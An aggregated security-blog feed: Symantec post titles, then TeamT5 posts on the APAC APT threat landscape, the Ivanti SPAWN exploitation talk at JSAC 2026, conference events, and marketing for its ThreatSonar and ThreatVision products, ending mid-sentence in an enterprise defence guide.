Pipes Feed Preview: Feed not found & SECURITY.COM & TeamT5 Blog & Natto Thoughts & JPCERT/CCブログ日本語版 & nao_sec & ESET Ireland & No Feed provided & No Feed provided & No Feed provided & No Feed provided & No Feed provided & No Feed provided & No Feed provided

🎙️SECURITY.COM The Podcast: 2026 Threat Predictions

Mon, 16 Feb 2026 13:00:00 -0000

This year’s threat forecast: ransomware, and a whole lot more
Identity is the control plane, and AI just changed the game

Thu, 12 Feb 2026 16:45:00 -0000

An AI-impacted identity ecosystem calls for a new take on an old approach
Don’t Lose Sleep Over These 4 Concerns

Wed, 11 Feb 2026 13:00:00 -0000

It takes legendary defenses to keep security nightmares at bay
Good News: Symantec DLP 25.1 Achieves Common Criteria EAL2+ Certification

Mon, 09 Feb 2026 13:00:00 -0000

Enterprise-grade data security, independently verified
🎙️SECURITY.COM The Podcast: AI Code Insecurity

Thu, 05 Feb 2026 13:00:00 -0000

Why better tech hasn’t solved code security, growing up in the industry, and when goofing around turns into a Senate invite
Reynolds: Defense Evasion Capability Embedded in Ransomware Payload

Thu, 05 Feb 2026 11:00:00 -0000

BYOVD component included in ransomware payload itself, rather than as a separate tool.
The Rise of OpenClaw

Wed, 04 Feb 2026 21:30:00 -0000

The growing threat of automated attack infrastructure
Cyber Legends: Inside The Mind of a Threat Analyst

Wed, 04 Feb 2026 13:00:00 -0000

How research, analysis, and communication turn signals into insight
Private Cloud is Back

Mon, 02 Feb 2026 16:00:00 -0000

Why federal agencies are rethinking hybrid cloud strategy
Better Together: Modernizing Access Management with Symantec SiteMinder and VMware vSphere Kubernetes Service

Thu, 29 Jan 2026 18:00:00 -0000

Say hello to a unified platform that brings identity security and cloud‑native infrastructure together
We’re Exhibiting at RSA Conference 2026

Sun, 08 Feb 2026 16:00:00 -0000

We are pleased to announce that we will be exhibiting at RSA Conference 2026, one of the world’s leading cybersecurity events, taking place in San Francisco. This year, we will join the Taiwan Pavilion and present our approach to threat intelligence built from Asia-born insights with global relevance. <ul> <li>Event: RSA Conference 2026</li> <li>Expo date: March 24-26, 2026</li> <li>Booth: S-1561</li> <li>Location: Moscone Center at San Francisco, USA</li> </ul> ##Threat Intelligence Pioneer, Born in Asia Cyber threats do not emerge evenly across regions.Many large-scale campaigns and advanced persistent threats (APTs) are first observed in Asia before expanding globally. As a threat intelligence team born and rooted in Asia, we focus on delivering early visibility into adversary behavior, regional geopolitical context, and long-term campaign evolution—helping organizations understand not only what is happening, but why it is happening. At RSA Conference 2026, we will showcase how Asia-Pacific–centric intelligence can complement global security strategies and close critical visibility gaps. ##Our Threat Intelligence Approach Our intelligence framework is designed to support security decision-making across strategic, tactical, and operational layers: ###Strategic: Geopolitical Insight & Adversary Profiling We analyze geopolitical drivers and long-term adversary behavior to help organizations anticipate emerging threats, understand attacker motivations, and assess risk beyond isolated incidents. ###Tactical: Intelligence-Driven Threat Hunting Our intelligence translates real-world adversary TTPs and active campaign insights into actionable threat hunting, enabling security teams to focus on relevant actors rather than generic indicators. ###Operational: Threat Response We help organizations operationalize threat intelligence and ensure intelligence is embedded directly into detection and response workflows. Together, these layers turn threat intelligence from static information into practical, actionable defense. For more about our threat intelligence reports and platform "ThreatVision", please check <a href="https://teamt5.org/en/products/threatvision/?utm_source=blog&utm_medium=website">here</a>. ##Meet Us at RSA Conference 2026 Throughout the three-day event, our team will be available at Booth S-1561 to discuss: <ul> <li>Asia-Pacific threat actors and campaigns</li> <li>Intelligence-driven threat hunting strategies</li> <li>Operationalizing threat intelligence at scale</li> <li>How regional intelligence enhances global defense</li> </ul> Whether you are building a CTI program, refining threat hunting workflows, or looking to strengthen operational response, we welcome the opportunity to connect. Threat Intelligence Pioneer, Born in Asia 📍 Visit us at RSA Conference 2026 – Booth S-1561 (Taiwan Pavilion) <img src="https://uploads.teamt5.org/upload/original/teamt5-rsa-conference-2026_pic.png" alt="">
APT Threat Landscape in APAC 2025: Industrialization of Intrusions

Sun, 08 Feb 2026 16:00:00 -0000

With geopolitical tensions continuing to escalate across the APAC region, APT activities in the region are intensifying in both volume and sophistication. In 2025, TeamT5 tracked more than 510 APT operations affecting 67 countries globally, up steadily from 2024. Of these, 173 attacks targeted Taiwan, far exceeding activity levels seen in other regional targets. Over the years, we observe Taiwan remains the most consistently and heavily targeted environment for cyber operations, with China responsible for the majority of observed activity. Taiwan’s role in geopolitical tensions and values in global technology supply chain makes it uniquely vulnerable for adversaries who seek intelligence or long-term access to achieve political and military objectives. The scale, diversity, and persistence of these campaigns position Taiwan not only as a frontline target, but also as an early-warning bellwether for the direction of China-nexus intrusion tradecraft. Campaigns observed in Taiwan frequently showcase early adoption of new tooling and evolving TTPs; therefore, Taiwan is more than just a target—it functions as a proving ground where China-nexus APTs test and refine their tactics before scaling them to other environments. <h2 id="key-trends-targeting-of-edge-devices-abuse-of-trusted-services-and-disposable-malware">Key Trends: Targeting of Edge Devices, Abuse of Trusted Services, and Disposable Malware</h2> As defenders continue to harden endpoints with capabilities like EDR, threat actors are adapting by shifting operations to layers with comparatively limited telemetry and weaker detection coverage. That shift is reflected in our 2025 findings: we tracked 27 critical vulnerabilities, most of which impacted edge devices such as firewalls, routers, and VPN appliances. Moreover, China-nexus actors have paired exploitation with custom backdoors tailored to specific device families. These backdoors are often designed to persist even after the underlying vulnerability is patched or the device is rebooted. This transforms one-time perimeter access into long-term access across victim networks and significantly raises the difficulty of detection and complete eradication. In addition, Internet of Things (IoT) devices are increasingly being abused by threat actors for a range of malicious objectives, particularly as low-noise infrastructure that blends into normal network traffic. For example, we observed actors chaining compromised IoT devices into operational relay box (ORB) networks to stage and route attacks, effectively obscuring the origin of malicious activity. In other cases, actors have abused Network Attached Storage (NAS) systems as reverse SSH tunnel relays, facilitating data exfiltration through an intermediary that often appears benign. Supply chain attacks accelerated further in 2025, reinforcing what TeamT5 describes as “Fail-of-Trust Model”. In a supply chain attack, threat actors compromise software vendors, managed service providers, or cloud service providers to exploit inherited trust and pivot into their downstream customer environments. In Taiwan, TeamT5 observed multiple attacks in which Chinese actors (e.g., Huapi and SLIME86) first compromised upstream IT service providers, then leveraged that access to move laterally into government, military, and critical infrastructure networks. In other notable cases attributed to China-nexus SocialNetworkTeam and SLIME40 (aka Salt Typhoon), threat actors compromised national telecom networks and used that access for long-term traffic interception and surveillance, including DNS manipulation and ISP-level hijacking. These campaigns directly erode the foundational assumptions of the digital ecosystem: that “trusted” suppliers are secure. By weaponizing trusted relationships as attack paths, supply chain operations turn implicit trust into a liability, hence the “Fail-of-Trust Model.” Consistent with this shift, we observed a clear uptick in 2025 attacks aimed at the IT sector. Threat actors are increasingly treating IT providers as strategic infrastructure, using them as launchpads to reach downstream targets more efficiently and at far greater scale. Malware deployment tradecraft also evolved in 2025. Across the 300+ malicious samples we tracked, we saw a clear rise in customized, disposable “one-time” malware. Much of it consisted of lightweight loaders and downloaders which are quick to build, easy to tailor to a specific intrusion chain, and inherently more capable of evading signature-based detection. In parallel, we increasingly observed multi-tool intrusion stacks, where actors deploy more than one malware family and/or a mix of malware and legitimate hacking tools within the same operation. This reduces single points of failure: if one component is detected or blocked, others can maintain access, pivot laterally, or re-establish command-and-control. For defenders, the result is a broader, more fragmented footprint that slows triage and makes complete eradication harder. <h2 id="from-apt-groups-to-a-china-nexus-whole-of-nation-apt-ecosystem">From APT Groups to a China-nexus “Whole-of-Nation” APT Ecosystem</h2> The observed increase in volume and sophistication of APT operations occurs in parallel with increasing signs of a maturing APT ecosystem in China. Over the years, China has been cultivating its offensive cyber capabilities through a “whole-of-nation” model: In this model, the state retains strategic direction (e.g., prioritizing intelligence requirements and target sets) while execution capacity is expanded through a market of contractors, brokers, and specialist vendors. Public attributions and industry reporting over the last few years increasingly describe a threat landscape where the boundary between “state” and “private sector” is operationally blurred, producing an industrial-scale pipeline for intrusions. The Chinese APT ecosystem blends state direction with “hacking-as-a-service” dynamics: capability is packaged, priced, and delivered in units that can be purchased, tasked, or repurposed. The 2024 I-Soon leak has shown how a private Chinese company conducted intrusions and monetized access and how such kind of contractor capacity can be integrated into state-aligned operations. In 2025, more evidence surfaced—via indictments, sanctions packages, and leaked materials—that Chinese private-sector vendors are not merely tooling suppliers but can play operational roles across intrusion activity. Taken together, these disclosures point to an ecosystem that is becoming more modular and specialized as it scales. That industrialization is most visible in the shift from a traditional “one APT group runs the full kill chain” assumption to a service-layered model. Instead of one team doing everything end-to-end, different providers can contribute capabilities at distinct stages. Examples map cleanly onto this cyber supply chain: At the front end are large-scale reconnaissance providers conducting internet-wide scanning and target profiling; Midstream are developers producing exploits, modular malware components, and tailored one-time payloads, optimized for specific environments; At the back end are infrastructure operators who specialize in command-and-control, proxy layers, and operational relay box (ORB) networks. This division of labor enables faster iteration, higher operational tempo, and greater resiliency. <h2 id="looking-forward">Looking Forward</h2> For governments, enterprises, and critical sectors worldwide,** the lesson is clear: indicator-driven defense can’t keep up with an industrialized intrusion ecosystem that can quickly change tools, servers, and routes when exposed.** Defenders therefore have to move upstream to proactive, hypothesis-driven threat hunting that prioritizes durable behaviors over short-lived signatures. This approach shifts the objective from “blocking known bad” to finding active tradecraft early, before the adversary completes collection and exfiltration. But hunting alone is not enough, because this is an ecosystem problem. Effective defense also requires deep regional intelligence that explains how the ecosystem is organized. That context turns scattered telemetry into actionable understanding, enabling defenders to distinguish who is responsible for reconnaissance, initial access, payload delivery, and infrastructure enablement. With those roles mapped, defenders can better anticipate likely next moves in the kill chain and apply disruption at the points of greatest leverage. TeamT5 believes meaningful impact depends on international collaboration grounded in shared adversary insight. In other words, defenders must compete with an industrial system by responding as a coordinated system. TeamT5 is committed to doing our part: contributing high-quality cyber threat intelligence, supporting joint response efforts, and strengthening the partnerships that make collective defense work. ## About TeamT5 TeamT5 is an APAC-focused threat intelligence expert. Leveraging Taiwan’s unique geopolitical vantage point, multilingual capabilities, and over two decades of research experience, we specialize in APT and ransomware threats across the Asia-Pacific region. We deliver highly localized, action-oriented threat intelligence and defense solutions for government, financial, and technology sectors. We believe that effective cybersecurity begins with continuous tracking and deep understanding of threats. With research at our core, TeamT5 transforms complex and rapidly evolving attack behaviors into actionable intelligence, enabling organizations to anticipate risks and shift from reactive response to proactive defense—reducing cyber risk. As a practitioner of intelligence-driven cyber defense, TeamT5 continuously monitors emerging threats, precisely analyzes attack patterns, and acts with agility to minimize risk exposure. We also value trust and collaboration, actively sharing research insights at world-class cybersecurity conferences and international forums. By working closely with the global security community, as well as our customers and partners, we help advance the practical application of threat intelligence and strengthen cyber resilience. <blockquote> More insights: <a href="https://teamt5.org/en/posts/seeing-the-pattern-behind-the-attacks-apac-intelligence-for-cis-os-worldwide/?utm_source=website&utm_medium=website">[Whitepaper] Seeing the Pattern Behind The Attacks: APAC Intelligence for CISOs Worldwide</a> </blockquote>
Intelligence-driven cybersecurity check: How to accelerate the anti-hacking cycle of "detection → identification → response"?

Sun, 01 Feb 2026 16:00:00 -0000

In the wave of digital transformation, cybersecurity threats are ever-present. Imagine—attackers are silently infiltrating your network, using legitimate tools to bypass endpoint detection and response (EDR) platforms and implant hidden backdoors. According to <a href="https://bisi.org.uk/reports/apts-global-review-2022-2025-trends-regions-forecast">BISI</a>'s global <a href="https://teamt5.org/en/posts/what-is-advanced-persistent-threat-apt/">advanced persistent threat (APT)</a> trends survey, since 2022, the frequency and complexity of APT attacks have been increasing, with more than half of APT attacks concentrated in the Asia-Pacific region, affecting <a href="https://teamt5.org/en/posts/2025-h1-apt-threat-landscape-insights-asia-pacific-emerges-as-cyberattack-hotspot-experts-highlight-critical-defense-priorities/?utm_source=blog&utm_medium=website">the IT industry, government agencies, and infrastructure</a>. These are just the tip of the iceberg; many more attacks remain undetected beneath the surface, which does not mean that enterprises or organizations have not been compromised. Let's explore together how to shorten the defense cycle and achieve effective resource allocation of "speed × depth × coverage" with limited resources. ##The stealthy attacker: the defender's "blind spot". Today's cybersecurity attacks have entered the era of "disguise." APT groups cleverly exploit built-in Windows tools, system services, and even legitimate third-party applications to maliciously bypass the detection of cybersecurity solutions. Common APT camouflage techniques include: <ul> <li>Disguising as Legitimate Activity: Masquerades as legitimate tools or OS-native functions to evade EDR/AV detection</li> <li>Neutralizing Monitoring Points: Disables Windows monitoring and scanning functions to evade EDR detection</li> <li>Minimizing Artifacts: Hidden backdoors that activate only under specific connection sequences and are normally not detected.</li> </ul> Meanwhile, enterprise IT infrastructure is becoming increasingly decentralized. The intermingling of cloud services, outsourcing vendors, subsidiaries, and remote work environments creates a significant gap in visibility for defenders. Any unmonitored or unreported endpoint device may harbor a threat, further blurring the defender's vision. <blockquote> For more attack methods and prevention strategies that bypass EDR defenses, please see the article analysis: <a href="https://teamt5.org/en/posts/how-cybercriminals-bypass-edr-and-what-your-company-should-do-1/?utm_source=blog&utm_medium=website">How Cybercriminals Bypass EDR — And What Your Company Should Do</a> </blockquote> ##The triangular dilemma of limited resources: speed, depth, and coverage. Frontline cybersecurity personnel typically face the challenge of limited resources, often having to make trade-offs between speed, depth, and coverage—three factors that are difficult to achieve simultaneously in practice. ThreatSonar's core philosophy is to rapidly narrow down the scope of unknown threats using a "first screening → focused in-depth → precise handling" model, reducing the investigation from "thousands of devices" to "a few critical devices" within limited resources. Its defense strategy is analogous to "conducting a comprehensive health check first, followed by further diagnosis." ##ThreatSonar's dual-axis defense strategy: "Emergency Situation" and "Routine Operations" Two key application scenarios for ThreatSonar, constructing a complete defense strategy: 1. During emergencies: Rapid screening When a suspected intrusion or anomaly occurs, having the time to respond is crucial. <ul> <li>Rapid Locator: ThreatSonar can complete an endpoint scan in approximately one hour, identifying critical suspicious devices from thousands of devices.</li> <li>Deep Forensics: Deep forensic analysis is performed on the identified compromised devices.</li> </ul> This mechanism not only significantly shortens the investigation cycle but also avoids a large amount of time wasted on false positives and redundant analysis. 2. During Routine Operations: Regular Compromise Assessment (CA) During normal operation, ThreatSonar monitors operational status and ensures environmental safety through regular scans. <ul> <li>Establishing a Baseline: Initially establishing a normal baseline for the environment.</li> <li>Periodic Scans: Monthly or quarterly scans are used to compare newly emerging anomalies, such as unknown programs and connections, persistent mechanisms (e.g., automatic startup, WMI events), and DNS records and execution history.</li> </ul> Regular scanning allows businesses to detect potential suspicious activity early, effectively preventing threats from escalating. <blockquote> <a href="https://teamt5.org/en/products/threatsonar/?utm_source=blog&utm_medium=website">More about ThreatSonar features</a> </blockquote> ##ThreatSonar's Four Core Advantages ThreatSonar is not just a scanning tool, but a threat identification and analysis platform that integrates threat intelligence: 1. Specialized APT Detection: Built-in YARA rule base, integrating thousands of APT backdoor signatures, and capable of importing External Intrusion Indicators (IoC) and STIX format intelligence, effectively uncovering latent threats that bypass Endpoint Detection and Response (EDR). 2. Lightweight Deployment: Supports Windows, Linux, macOS, and other operating systems. Lightweight installation; a download of approximately 5MB of executable file allows for immediate deployment without the need for driver installation or system configuration changes. Facilitates rapid, large-scale deployment, quickly enhancing enterprise defense capabilities. 3. Comprehensive Visualization and Threat Classification: Performs horizontal analysis from files, memory, network connections to event logs. Threat risk levels are presented in Levels 0–5, helping administrators prioritize threat responses. 4. Memory identification and behavior tracing: ThreatSonar can analyze memory and hacking paths, and through timeline tracing, uncover the root cause of the attack and fully reconstruct the attack process. <blockquote> <a href="https://teamt5.org/en/products/threatsonar/?utm_source=blog&utm_medium=website">More about ThreatSonar features</a> </blockquote> ##Real-world Case Studies: ThreatSonar's Immediate Effectiveness ThreatSonar demonstrates significant benefits in real-world scenarios: <ul> <li>Case Study 1: Comprehensive Health Check for a Large Enterprise A major company that has implemented ThreatSonar to conduct a comprehensive scan of 10,000 endpoints. Within two weeks, it successfully discovered APT attack samples disguised as files and 2,268 malicious files (related to Ruby). Through automated analysis and threat risk classification, the company was able to quickly identify the hacking path and establish a long-term, periodic assessment mechanism. </li> <li>Case Study 2: Rapid Response to Global Cybersecurity Incidents in the Manufacturing Industry A manufacturing group with 50,000 employees accelerated its global incident response process through ThreatSonar. Before implementing ThreatSonar, the analysis process took 200 hours; after implementation, it only took 40 hours. Using ThreatSonar, a preliminary forensic report was completed within a few days, and the decision-making process at overseas locations was accelerated by more than five times, significantly improving overall response efficiency. </li> </ul> <blockquote> <a href="https://teamt5.org/en/products/threatsonar/?utm_source=blog&utm_medium=website">More about ThreatSonar features</a> </blockquote> ##Conclusion: The Intelligence-Driven Future of Cybersecurity ThreatSonar transforms threat defense from a passive "defense" approach to a proactive "diagnosis" approach. It not only helps enterprises shorten the time from "discovery" to "response" (Mean Time To Detect, MTTD / Mean Time To Recover, MTTR), but also, through establishing benchmark monitoring models and conducting regular checks, ensures accurate cybersecurity responses in both "daily operations" and "incident response" scenarios. In an era of limited resources and unlimited threats, the TeamT5 solution embodies an "intelligence-driven" cybersecurity mindset—based on threat intelligence and centered on insight, it enables rapid and effective proactive threat defense.
【Japan Security Analyst Conference 2026】TeamT5 Will Give Speech on the the Massive Exploitation of Ivanti

Wed, 07 Jan 2026 16:00:00 -0000

This year, Japan Security Analyst Conference 2026 (JSAC2026) will be held on Jan. 21-23. This annual cyber security conference hosted by JPCERT/CC, aimed to bring together security analysts and provide opportunities for them to share technical knowledge related to incident response and analysis. Our Vulnerability Researcher, Greg Chen, and Incident Response Engineer, Sharon Liu, will deliver a talk titled “Incident Response at the Edge: Unmasking the Massive Exploitation of Ivanti” from 16:10 to 16:50 on January 22. <h3 id="about-speech">About Speech</h3> Since April 2025, TeamT5 has been warning of large-scale exploitation campaigns against Ivanti Connect Secure VPN, in which hundreds of devices belonging to the governments and enterprises across more than 20 countries were compromised by the notorious SPAWN malware family (reference). In particular, over 40 companies’ Ivanti appliances were compromised in Japan, affecting high-value industries such as telecommunications, semiconductors, electronics, etc. These attacks demonstrate the growing risks at the edge of enterprise networks. Despite being the backbone of remote access, VPN appliances often operate as "black boxes" —proprietary devices with only web-based maintenance access for IT. The lack of low-level shell control makes them opaque and proprietary, creating blind spots in enterprise security. Their limited visibility allows attackers to maintain long-term persistence while making these devices exceptionally hard to investigate. This leads to the core focus of our presentation, which centers on the Ivanti VPN appliance and covers three main areas: (1) how we identify VPN devices compromised by the SPAWN malware family, (2) our methodology for investigating such black-box systems, and (3) the use of heuristic approaches beyond traditional pattern-based detection. Ultimately, we demonstrate practical detection solutions capable of identifying the SPAWN malware families in Ivanti appliances, along with detection strategies that organizations can adopt to strengthen defenses against ongoing and future VPN-targeted attacks. <h3 id="about-jsac-2026">About JSAC 2026</h3> <ul> <li>Time: Jan. 21-23, 2026</li> <li>Venue: Akasaka Intercity Conference Center, Tokyo, Japan</li> <li>Website: <a href="https://jsac.jpcert.or.jp/en/index.html">https://jsac.jpcert.or.jp/en/index.html</a></li> </ul> Cyber attacks occur on a daily basis, and its techniques have been constantly changing. Engineers who analyze and respond to them are required to improve their skills to keep up with the ever-changing techniques of cyber attacks. However, there are few occasions in Japan where techniques and knowledge of incident analysis and response are shared among engineers. Security analysts are expected to get together and exchange their technical expertise on incident handling to develop their strength against cyber attacks both individually and as a whole. To achieve this goal, JPCERT/CC hosts Japan Security Analyst Conference (JSAC), the annual conference for exchanging technical information on cyber security incident analysis and response. In this conference, security analysts who handle security incidents on a daily basis are encouraged to share information with each other to deal with ever-evolving cyber attacks today and in the future.
【TeamT5 Event Calendar 2026】Come by to find suitable solutions and build cybersecurity resilience!

Tue, 06 Jan 2026 16:00:00 -0000

Welcome to the event to learn about TeamT5's intelligence-driven cybersecurity solutions. ##Future Events ###2026/3/23~3/26 RSA Conference <ul> <li>Country: USA</li> <li>Venue: Moscone Center, San Francisco, CA</li> <li>Booth: S-1561 (Taiwan Pavilion)</li> <li>More info: <a href="https://www.rsaconference.com/usa">event website</a></li> </ul> ###2026/5/5~5/7 CYBERSEC <ul> <li>Country: Taiwan</li> <li>Venue: Hall 2 of Taipei Nangang Exhibition Center, Taipei</li> <li>More info: <a href="https://cybersec.ithome.com.tw/2025/en/">event website</a></li> </ul> ###2026/6/15~6/19 FIRSTCON <ul> <li>Country: USA</li> <li>Venue: Sheraton Denver Downtown Hotel, Denver, CO</li> <li>More info: <a href="http://www.first.org/conference/2026">event website</a></li> </ul> ###2026 Digital Government Summit <ul> <li>Country: Taiwan</li> <li>City: Taipei</li> <li>More info: <a href="https://egov.ithome.com.tw/2025/index.html">event website</a></li> </ul> ###2026/12/2~12/3 Threat Analyst Summit <ul> <li>Country: Taiwan</li> <li>Venue: ILLUME TAIPEI, Taipei</li> <li>More info: <a href="https://tas.teamt5.org/?utm_source=websitecalendar&utm_medium=website">event website</a></li> </ul> <h2 id="past-events">Past Events</h2> ###2026/1/21 ~ 1/23 JSAC <ul> <li>Country: Japan</li> <li>Venue: Ochanomizu Sora City Conference Center, Tokyo</li> <li>Our cyber threat intelligence researchers will give a speech at the venue.</li> <li>More info: <a href="https://jsac.jpcert.or.jp/">event website</a></li> </ul> *The information of each event is subject to change by the organizer. *This article is updated from time to time.
Outpace Ransomware Operators with ThreatVision Cybercrime Intelligence

Sun, 04 Jan 2026 16:00:00 -0000

Ransomware attacks are no longer isolated incidents; they now operate as a fully developed criminal ecosystem built on organization and industrialization. From vulnerability exploitation and initial access, to data exfiltration and ransom negotiation, different actors participate in each stage, forming active and tightly connected networks across the dark web and underground forums. In the era of scalable Cybercrime-as-a-Service (CaaS), enterprises relying solely on passive response and remediation often struggle to keep pace with rapidly evolving attacks. <a href="https://teamt5.org/en/products/cybercrime-intelligence/?utm_source=blog&utm_medium=website">ThreatVision Cybercrime Intelligence</a> is built on TeamT5’s long-standing research into APAC threat actors. By continuously tracking ransomware groups and underground criminal communities, ThreatVision helps enterprises gain deeper visibility into attacker motivations, technique evolution, and operational patterns, enabling security teams to shift from reactive response to proactive prevention, and to build stronger, long-term cyber resilience. ##Intelligence-Driven Insights: Revealing the True Nature of Cybercrime The core value of ThreatVision lies in its ability to consolidate dispersed information from underground communities and transform it into contextualized intelligence. Leveraging years of sustained observation of major ransomware and cybercrime operations across APAC, TeamT5 delivers three key intelligence categories that help enterprises stay informed on the most relevant developments: <ul> <li>Cybercrime Campaigns In-depth analysis of specific criminal operations and cooperation chains between groups, revealing shifts in attacker strategy, target selection, and technical approaches. </li> <li>Forum Activities Continuous monitoring of dark web and underground forum discussions, data leaks, and illicit transactions to identify early indicators of emerging threats. </li> <li>Ransomware Activities Up-to-date tracking of major ransomware groups, analyzing attack trends, targeted industries, and technical evolution. </li> </ul> Together, these three intelligence categories provide a multi-angle view of cybercriminal behavior, enabling defense teams to understand the logic behind attacker activities and adjust detection strategies and security priorities accordingly. ##From Intelligence to Action: Using ThreatVision Reports for Effective Defense <a href="https://teamt5.org/en/products/cybercrime-intelligence/?utm_source=blog&utm_medium=website">ThreatVision’s cybercrime intelligence reports</a> not only provide contextual descriptions of attacks, but also disclose associated Indicators of Compromise (IoCs), such as IP addresses, domains, and malicious file hashes. Enterprises can directly search and cross-reference these indicators within the ThreatVision platform to quickly determine whether they overlap with internal logs, network traffic, or alerts generated by Endpoint Detection and Response (EDR) and Security Information and Event Management (SIEM) systems, enabling immediate investigation or adjustment of blocking rules. In addition, ThreatVision provides information on malicious samples associated with criminal activities and attacks. This allows security teams to quickly determine possible origins and potential impact, improving the accuracy and efficiency of incident response. ##From Observation to Early Warning: Building a Long-Term Intelligence-Driven Defense Cycle To keep pace with fast-changing cybercrime activity, enterprises need intelligence that can be continuously updated, monitored, and operationalized in daily defense workflows. With <a href="https://teamt5.org/en/products/cybercrime-intelligence/?utm_source=blog&utm_medium=website">ThreatVision Cybercrime Intelligence</a>, organizations can understand the background and context behind attack operations, use accompanying IoCs to verify exposure within their own environments, and access correlated intelligence on the platform. This enables the creation of a defense cycle that adapts dynamically as threats evolve. <img src="https://uploads.teamt5.org/upload/original/pic_outpace-ransomware-operators-with-threat-vision-cybercrime-intelligence.jpg" alt=""> <blockquote> Download the <a href="https://teamt5.org/en/posts/seeing-the-pattern-behind-the-attacks-apac-intelligence-for-cis-os-worldwide/?utm_source=blog&utm_medium=website">cybercrime intelligence report “Seeing the Adversary: Why APAC Intelligence Matters for CISOs”</a> to understand how insights into attacker motivations and behavior can strengthen your organization’s defensive resilience. </blockquote>
Enterprise Cybersecurity Defense Guide [2026 Version]: How Can Enterprises Reduce Risks and Defend Against Threats?

Thu, 01 Jan 2026 16:00:00 -0000

Faced with the rapid escalation of AI-driven attacks, ransomware threats, and cloud risks in 2026, enterprises must possess more mature and comprehensive cybersecurity defense capabilities. This article draws upon over 20 years of cybersecurity experience from <a href="https://teamt5.org/en/about-us/?utm_source=blog&utm_medium=website">TeamT5</a>, summarizing the latest threat trends and practical recommendations, and highlighting key considerations when selecting a cybersecurity solution. We hope to help enterprises quickly grasp current cybersecurity challenges, establish more resilient protection strategies, and assist them in achieving continued and robust growth. ##Common Cybersecurity Threats for Enterprises The most common cyber threats to enterprises include ransomware, malware, and cybercrime activities on the dark web and underground forums. To minimize these risks, it is recommended to implement appropriate cybersecurity solutions or services. Strengthening enterprises’ cybersecurity resilience can help prevent operational disruptions, data breaches, and potential damage to your enterprise reputation. ##Growing Ransomware Threat: Enterprises must prepare in advance Ransomware encrypts data or blocks system access, preventing enterprises from maintaining daily operations and demanding a ransom in exchange for decryption. However, the impact of ransomware attacks goes far beyond simply "data encryption”. Its potential consequences include: ####1. Data Encryption and Operational Disruption Attackers often encrypt critical systems, servers, or endpoints, making it impossible for enterprises to carry out daily operations, deliver services, or access important files. These disruptions can last for days or even weeks. ####2. Double-Edged Sword: Data Breach Risk Current ransomware attacks often employ a "steal first, encrypt later" approach. The leaked data may be publicly disclosed or sold, extending the impact beyond operational disruption to privacy, regulatory compliance, and reputational risks. ####3. High Ransom and Subsequent Costs In addition to potentially hundreds of thousands to millions of dollars in ransom, enterprises must also handle long-term costs such as system rebuilding, compliance requirements, customer notification and remediation, and reputational damage. ####4. Attackers May Not Fulfill Their Obligations Even if the ransom is paid, there is no guarantee that a valid decryption key will be obtained or that the leaked data has been deleted. Enterprises may even face further ransom demands or persistent attacks. Therefore, every enterprise must prepare for prevention, detection, and response early on. It is recommended to purchase an endpoint detection and response (EDR) solution that effectively blocks ransomware to assist enterprises in timely detection and response. For EDR application scenarios and purchasing guidelines, please refer to: <ul> <li><a href="https://teamt5.org/en/posts/simplify-complex-cybersecurity-smarter-endpoint-monitoring-and-management/?utm_source=blog&utm_medium=website">Simplify Complex Cybersecurity: Smarter Endpoint Monitoring & Management </a></li> <li><a href="https://teamt5.org/en/posts/key-considerations-for-evaluating-endpoint-detection-and-response-edr-solutions/?utm_source=blog&utm_medium=website">Endpoint Detection and Response (EDR) Solution: Key Considerations for Procurement</a></li> </ul> ##Malware Risk: Conduct routine system checks and strengthen zero-trust security strategy Malicious software (also known as malware) takes many forms, including viruses, Trojans, spyware, worms, and keystroke interceptors. Attackers often use social engineering, phishing emails, malicious links, or infected software updates to infiltrate corporate environments. Once a breach is successful, malware can cause a variety of serious consequences, such as stealing confidential information, modifying system settings, monitoring user behavior, opening backdoors for subsequent attacks, and even becoming a precursor to ransomware intrusions. For enterprises, the threat of malware is not limited to the technical level; it can also lead to operational disruptions, paralysis of critical systems, leakage of customer data, and damage to reputation. With the widespread availability of attack tools and AI technology, the cost of creating and distributing malware has been significantly reduced, making enterprises of all sizes targets. Only by regularly conducting system health checks and threat hunting—proactively identifying and mitigating potential threats that may bypass general cybersecurity measures—can enterprises effectively reduce the risks posed by malware. Learn how threat hunting defends against malware: <ul> <li><a href="https://teamt5.org/en/posts/what-is-threat-hunting/?utm_source=blog&utm_medium=website">What is Threat Hunting?</a></li> <li><a href="https://teamt5.org/en/posts/5-benefits-of-threat-hunting-strategies-for-enterprises/?utm_source=blog&utm_medium=website">5 Benefits of Threat Hunting Strategies for Enterprises</a></li> <li><a href="https://teamt5.org/en/posts/never-trust-always-verify-how-to-enhance-zero-trust-strategy/">“Never Trust, Always Verify” – How to Enhance Zero-trust Strategy?</a></li> </ul> ##Dark Web Risks: Enterprises should monitor for leaked trade secrets and sensitive data The dark web, hidden from traditional search engines and browsers, is a network frequently used by attackers to exchange attack tools and plan or discuss attack schemes, posing an unprecedented challenge to corporate cybersecurity. Enterprises must recognize the potential impact of the dark web and establish corresponding detection and defense measures as early as possible to reduce the risks of data breaches, credential theft, and brand damage. Here are some things you need to know about the dark web: <ul> <li><a href="https://teamt5.org/en/posts/what-is-the-dark-web/?utm_source=blog&utm_medium=website">What is the Dark Web?</a></li> <li><a href="https://teamt5.org/en/posts/the-impact-of-dark-web-on-enterprise-cybersecurity/?utm_source=blog&utm_medium=website">The Impact of Dark Web on Enterprise Cybersecurity</a></li> <li><a href="https://teamt5.org/en/posts/real-cases-of-how-the-dark-web-has-affected-enterprises-and-how-they-could-have-prevented-it/?utm_source=blog&utm_medium=website">Real Cases of How the Dark Web Has Affected Enterprises and How They Could Have Prevented It</a></li> </ul> ##Cybercrime Risk: Businesses should track trends and deploy defenses proactively As enterprises become fully digitized, the internet has become a crucial foundation for daily operations, but it also exposes organizations to more complex and diverse cybercrime threats. From ransomware attacks to data breaches, criminal methods continue to evolve. Attackers not only collaborate closely through the dark web and underground forums using a "Cybercrime as a Service" (CaaS) model, but they are also adept at using automated tools and AI technologies to find exploitable vulnerabilities. Enterprises must stay abreast of the dynamics of ransomware groups and underground criminal communities, understanding their attack motives, technological evolution, and activity patterns in order to accurately assess the potential impact of these threats on their operations and take effective defensive measures to strengthen cybersecurity resilience, reduce operational risks, and ensure stable enterprise operations. Here are some things you need to know about cybercrime: <ul> <li><a href="https://teamt5.org/en/posts/what-is-cybercrime-and-how-can-organizations-defend-against-it/?utm_source=blog&utm_medium=website">What Is Cybercrime and How Can Organizations Defend Against It?</a></li> <li><a href="https://teamt5.org/en/posts/threatvision-cybercrime-intelligence-revealing-threats-from-the-hacker-s-perspective/?utm_source=blog&utm_medium=website">ThreatVision Cybercrime 